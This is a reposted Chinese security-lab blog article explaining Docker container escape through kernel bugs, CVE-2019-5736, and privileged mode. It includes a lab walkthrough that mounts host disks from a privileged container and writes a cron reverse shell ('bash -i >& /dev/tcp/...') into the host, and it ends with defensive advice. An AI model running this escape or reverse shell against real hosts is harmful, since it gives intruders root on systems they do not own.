docker privileged作用_美创安全实验室 | Docker逃逸原理

最新推荐文章于 2024-06-05 08:50:27 发布
最新推荐文章于 2024-06-05 08:50:27 发布
阅读量1.1k 收藏 2
点赞数 2
文章标签: docker privileged作用 docker 挂载目录 docker宿主机访问容器 docker访问宿主机端口

822bc1743c53435b629ab0188d046ab7.png

Docker是时下使用范围最广的开源容器技术之一,具有高效易用等优点。由于设计的原因,Docker天生就带有强大的安全性,甚至比虚拟机都要更安全,但你可曾想过“坚不可摧”的Docker也会被人攻破,Docker逃逸所造成的影响之大几乎席卷了全球的Docker容器。本期美创安全实验室将会带大家研究造成Docker逃逸的根本原理以及相应的防御方法。

Docker简介

Docker是一种容器,容器的官方定义是:将软件打包成标准化单元、以用于开发、交付和部署。容器的特点在于格式统一,运行速度快,所需资源小,并且可以层层重叠。
与虚拟机的架构进行一下对比就可以看出,Docker整体的架构更加轻巧,灵活。而且由于Docker是直接利用宿主机的系统内核,所以可以做到几秒钟之内创建大量的容器,他们的启动速度是在数量级上的差距。

6db67eb330c7de3090007e9cedc4b04e.png

虚拟机与Docker的架构对比图:左为虚拟机架构、右为Docker架构

Docker逃逸原理

因为Docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个容器可以访问到外面的资源,甚至是获得了宿主主机的权限,这就叫做“Docker逃逸”。
目前产生Docker逃逸的原因总共有三种:

  1. 由内核漏洞引起。
  2. 由Docker软件设计引起。
  3. 由特权模式与配置不当引起。

接下来依次对这三种逃逸方法做简单说明。

01由于内核漏洞引起的逃逸

因为Docker是直接共享的宿主主机内核,所以当宿主主机的内核存在安全漏洞时会一并影响Docker的安全,导致可能会造成Docker逃逸。具体流程如下:

①使用内核漏洞进入内核上下文

②获取当前进程的task struct

③回溯task list 获取pid = 1的task struct,复制其相关数据

④切换当前namespace

⑤打开root shell,完成逃逸

02由于Doker软件设计引起的逃逸

比较典型的例子是Docker的标准化容器执行引擎----runc。Runc曾在2019年2月被爆出来过一个Docker逃逸漏洞CVE-2019-5736。其漏洞原理是,Docker、Containerd或其他基于runc的容易在运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作获取到宿主机runc执行文件时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限,造成Docker逃逸。

03由于特权模式+目录挂载引起的逃逸

这一种逃逸方法较其他两种来说用的更多。特权模式在6.0版本的时候被引入Docker,其核心作用是允许容器内的root拥有外部物理机的root权限,而此前在容器内的root用户只有外部物理机普通用户的权限。

使用特权模式启动容器后(docker run --privileged),Docker容器被允许可以访问主机上的所有设备、可以获取大量设备文件的访问权限、并可以执行mount命令进行挂载。

当控制使用特权模式的容器时,Docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。

除了使用特权模式启动Docker会引起Docker逃逸外,使用功能机制也会造成Docker逃逸。Linux内核自版本2.2引入了功能机制(Capabilities),打破了UNIX/LINUX操作系统中超级用户与普通用户的概念,允许普通用户执行超级用户权限方能运行的命令。例如当容器以--cap-add=SYSADMIN启动,Container进程就被允许执行mount、umount等一系列系统管理命令,如果攻击者此时再将外部设备目录挂载在容器中就会发生Docker逃逸。

Docker逃逸实验(特权模式+目录挂载)


目标机:192.168.210.37

目标机上对外开启了Docker服务,运行在2375端口上。直接访问目标机的2375端口即可未授权查看Docker信息,如下:

ffec8435e71661f57caf444732fd4af4.png

查看当前docker中存在的所有容器:docker images

acf0a002cac927181509a4a2fe1f3416.png

使用特权模式启动容器

201d6370229737bc815b6a21deeb7e13.png

查看磁盘文件:fdisk -l

6c50caebf423cf7466b202cc0822f2c2.png

从返回结果来看sda1、sda2、sda3在/dev目录下。

8c4543f725b783141eb206706b27de8f.png

新建一个目录/test,然后将/dev/sda1挂载到新建的目录下

mkdir /test

mount /dev/sda1 /test

e21ff97d63ff7fd54be95424326af1f4.png

这时再查看新建的目录/test,就可以访问宿主机上的目录内容了(/root目录下的内容)

1ddd9796fd2636ab4603307796560517.png

同理,新建一个目录/test2,将/dev/sda3挂载到新建的目录下,并查看test2目录下的内容,发现可以访问宿主机上/目录下的内容了

0104be06add7188f908263d8d304dc95.png

在计划任务里写入一个反弹shell:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root

99597e9d4b2e58514d1591fe4f1ec45f.png

在Docker上开启netcat监听7777端口,成功接收到宿主主机的Shell,实现Docker逃逸。

7ee97f814f69c5a6ebd50385c4c56ef4.png

Docker逃逸防御

  • 更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736。
  • runc版本 >1.0-rc6
  • k8s 集群版本>1.12
  • Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)
  • Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险。
  • 不建议以root权限运行Docker服务。
  • 不建议以privileged(特权模式)启动Docker。
  • 不建议将宿主机目录挂载至容器目录。
  • 不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险。

本文转自杭州美创科技有限公司公众号,如需二次转载,请咨询marketing@mchz.com.cn。

weixin_39664998
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Docker操作实践(3):Docker的操作详解
weixin_42556618的博客
09-27 453
文章将从组织的学习利用一张图片分享几个概念和命令来了解Dorcker的命令... 今天是Docker讨论系列的终章,我们先从docker的命令开始介绍,再说明Docker run命令关键参数。 如果你还没看过前面的内容: 第一篇《容器的本质是什么?容器从何而来?》 第二篇《Docker的安装及架构介绍》 一张图了解docker命令 上图摘自:http://bingoh...
docker privileged作用_docker总结
weixin_39547596的博客
11-30 7248
docker基本命令是一个开源的应用容器引擎;是一个轻量级容器技术;docker主机(Host):安装了Docker程序的机器(Docker直接安装在操作系统之上);docker客户端(Client):连接docker主机进行操作;docker仓库(Registry):用来保存各种打包好的软件镜像;docker镜像(Images):软件打包好的镜像;放在docker仓库中;docker容器(Con...
(十二)docker --privileged
ddlcdlzn20146的博客
07-03 1178
1. privileged参数作用 --privileged Give extended privileges to this container 大约在0.6版,privileged被引入docker。 使用该参数,container内的root拥有真正的root权限。 否则,container内的root只是外部的一个普通用...
Docker容器开启特权模式
最新发布
xjfyt0129的博客
06-05 827
解决docker容器内特权模式的问题
Docker 从入门到掉坑
HollisChuang's Blog
12-14 560
Docker 介绍简单的对docker进行介绍,可以把它理解为一个应用程序执行的容器。但是docker本身和虚拟机还是有较为明显的出入的。我大致归纳了一下,可以总结为以下几点:docke...
[docker]privileged参数
热门推荐
追寻神迹
02-04 10万+
privileged参数 $ docker help run ... --privileged=false Give extended privileges to this container ... 大约在0.6版,privileged被引入docker。使用该参数,container内的root拥有真正的root权限。否则,container内的root只是外部的一个普通用户
delete_docker_registry_image
04-20
从github上拿到的第三方插件用于删除docker registry上的镜像
docker-20.10_install.tar.gz
01-22
Docker 20.10 安装详解】 Docker 是一个开源的应用容器引擎,它基于 Go 语言并遵循 Apache2.0 协议开源。Docker 可以让开发者打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上...
docker-compose_install.tar.gz
08-12
离线安装 DockerDocker Compose 的方法虽然相比在线安装步骤更多,但能够适应那些网络条件有限或者对安全性有特殊要求的环境。这个压缩包提供了一种方便的方式来解决这些问题,使得即使在离线状态下也能顺利部署...
docker-ce_18.06.3.ce-1_mips64el
04-01
对应文章:https://blog.csdn.net/SoaringLee_fighting/article/details/120777014 mips平台docker安装包!
Docker_Docker_action_
09-29
Jeff Nickoloff - Docker in Action-Manning Publications (2016)
docker--privileged
zhou920786312的博客
08-15 1万+
一、 privileged=true|false 介绍 true container内的root拥有真正的root权限。 false container内的root只是外部的一个普通用户权限。 默认false privileged启动的容器 可以看到很多host上的设备 可以执行mount。 可以在docker容器中启动docker容器。 二、测试验证 2.1、未设置privileged启动的容器 docker run -it centos:7.7.1908 bash 不可以执行
docker privileged作用_Docker学习笔记:(1)Docker基础知识
weixin_39828847的博客
11-20 856
Docker简介Docker容器虚拟化技术的实现。将运作应用所需要的系统环境,由下而上打包成镜像,以达到应用跨平台间的无缝接轨运作。Docker和传统虚拟化方式的不同之处1)传统虚拟机技术是虚拟出一套硬件,并在其上运行一个操作系统,在该系统上再运行所需应用进程。而容器没有进行硬件虚拟,容器内没有自己的内核,容器内的应用进程直接运行于宿主的内核。因此容器要比传统虚拟机更为轻便。2)每个容器之间互相...
docker run:--privileged=true选项解析(特权模式:赋予容器几乎与主机相同的权限)
Dontla的博客
09-18 2万+
在默认情况下,Docker容器的权限进行了严格的限制,只提供了有限的capabilities。因此,我们需要谨慎地使用这个选项,只在必要的情况下才启用它,并尽量使用其他更细粒度的权限控制手段。选项为容器提供了强大的功能,但它也带来了一些严重的安全隐患。由于privileged容器具有几乎与主机相同的权限,所以如果容器被恶意代码控制,那么攻击者就可以轻易地突破容器的边界,对主机进行任意操作。Docker默认情况下会赋予容器一些必要的capabilities,但不包括全部的能力,从而降低了被攻击的风险。
Docker privileged
云满笔记
11-25 1085
Docker privileged
docker privileged作用_docker容器性能监控cAdvisor+influxDB+grafana监控系统安装部署
weixin_39807691的博客
11-24 137
一、 cAdvisor+influxDB+Grafana介绍框架名特点、作用角色CadvisorGoogle开源的用于基础设施应用的工具,可以零配置运行在docker主机上来监控docker主机及docker容器。其为单节点监控,只能监控一个主机。多点监控可参考Google的Kubernetes作为docker服务的监控数据收集器,提供给influxdbInfluxdbInfluxdb是用Go语言...
扩展表空间3种方式
congzhirou8448的博客
01-27 245
扩大表空间 alter database datafile 'D:\ORACLE\ORADATA\LYGL\SDE.DBF' resize 20480m; 增加新的数据文件 ...
docker中--privileged的使用
weixin_42715225的博客
04-19 1万+
#### 前言 --privileged可以满足我们的定制化需求 #### 作用 - 使container内的root拥有真正的root权限,否则只是外部的一个普通用户权限 - 可以看到很多host上的设备,并且可以执行mount - 允许你在docker容器中启动docker容器 #### 示例 > docker run -it --privileged=true...
docker privileged用法
完颜振江
02-06 3464
标志来运行容器时,容器内的进程将具有对主机系统的完全访问权限,包括访问设备、挂载文件系统等。这在一些特定的使用情况下可能是必要的,但同时也带来了一些安全风险。标志在某些情况下很有用,但也存在潜在的安全风险。因为容器内的进程可以直接影响到主机系统,如果恶意进程获得了容器的控制权,可能会对主机系统造成严重的损害。标志,并且在可能的情况下采取其他更安全的替代方案。是Docker容器的一个选项,用于授予容器内的进程对主机系统的更高权限。标志来授予容器对这些设备的访问权限,而不必使用。因此,建议仅在确实需要时使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值